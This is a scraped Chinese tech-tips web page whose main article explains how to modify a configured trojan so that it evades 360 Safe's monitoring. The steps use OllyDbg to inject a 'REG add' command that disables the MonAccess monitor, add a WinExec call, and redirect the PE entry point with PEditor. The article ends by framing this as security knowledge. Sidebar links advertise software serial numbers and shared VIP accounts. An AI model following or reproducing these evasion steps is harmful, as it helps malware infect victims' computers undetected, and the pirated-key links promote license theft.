- 1PS提示:因为图层已锁定,无法编辑图层的处理方法
- 2picacg苹果版怎么找不到|picacg ios版是不是下架了介绍
- 3Adobe Illustrator CS5 序列号大全
- 4ACDsee注册码免费分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么换头像|Potato app更改头像方法介绍
- 6PDF浏览器能看3D文件吗?PDF浏览器看3D文件图文详细教程
- 7Potato(马铃薯聊天)怎么注册不了|Potato不能注册处理方法介绍
- 8最新的Adobe Illustrator CS4序列号大全
- 9Intel i7-9700K性能跑分曝光:同代提升约12%
- 10Intel Z390主板有望10月8日公布:8核9代酷睿随后登场
- 11XP系统怎么清除缓存?
- 12ACDSee与2345看图王哪一个好用?区别比较
[摘要]ASM汇编 这个是最舒服的, 用OD打开已经配置好的马, 找0区(也可以用TOPO加空段)要很大一片哦!右击, 选择“二进制”→&...
ASM汇编
这个是最舒服的, 用OD打开已经配置好的马, 找0区(也可以用TOPO加空段)要很大一片哦!右击, 选择“二进制”→“编辑”, 在ASCII中输入“Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址, 假设为401180。
再找一个小空段, 记下地址, 假设为40116A
写入:
Push 401180 (也就是那个改动的地址)
Call WinExec
Jmp 原程序入口点(在OD右边窗口的EIP后面可以看到)
打开OC把40116A转换为文件偏移0000056A
再用PEditor打开, 把原入口点改为0000056A
这样一个过360服务监控的木马就诞生了。
(大家完全可以按照加花的步骤来写, 就是命令不同而已)
大家也可以禁用其他360的监控项目, 即使加个花都没问题, 随便大家发挥了。
上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。
推荐资讯 总人气榜
最新教程 本月人气
- 1Revit绘制特殊的SU楼梯的方法
- 2Revit怎么绘制曲面嵌板?3种Revit曲面嵌板效果的画法
- 3Revit公式使用方法大全
- 4Revit在项目中使用注释标签的几个技巧
- 5Revit工作平面的概念介绍与使用方法
- 6Revit编辑组中的图元的工具与方法
- 7Revit自动创建坡道的方法
- 8使用Revit与CAD绘制出螺旋型屋面的方法
- 9让Revit平面图的线型、线宽与颜色符合我们的要求的方法
- 10Revit族样板分类以及创建Revit族样板的方法
- 11Revit模型文字介绍
- 12Revit创建暖通系统的详细步骤
- 1全民k歌怎么删除自己的作品|全民K歌删除自己歌曲方法介绍
- 2芒果tv会员账号共享2017.5.27芒果tv最新共享vip会员账号更新
- 3黄油相机怎么删除水印?黄油相机删除水印的方法
- 4红米3什么时候上市 红米3上市时间
- 5为什么苹果手机2G运行内存比安卓手机4G内存更流畅?
- 6iPhone7先别买,10周年iPhone8憋了这么多大招!
- 7iPhone 8打王者荣耀绝对不会卡 因为有它
- 8iphone8概念图,屏幕设计改为内弯曲,采纳A11处理器,4GB运行内存?你点睇?
- 9iPhone iOS10.3.2耗电又卡顿?一键处理
- 10iPhone刷机经常见未知出错区分及处理方法
- 11iPhone 8原型机现身:所有方面屏,玻璃下指纹识别
- 12Word排版时图片为什么看不清
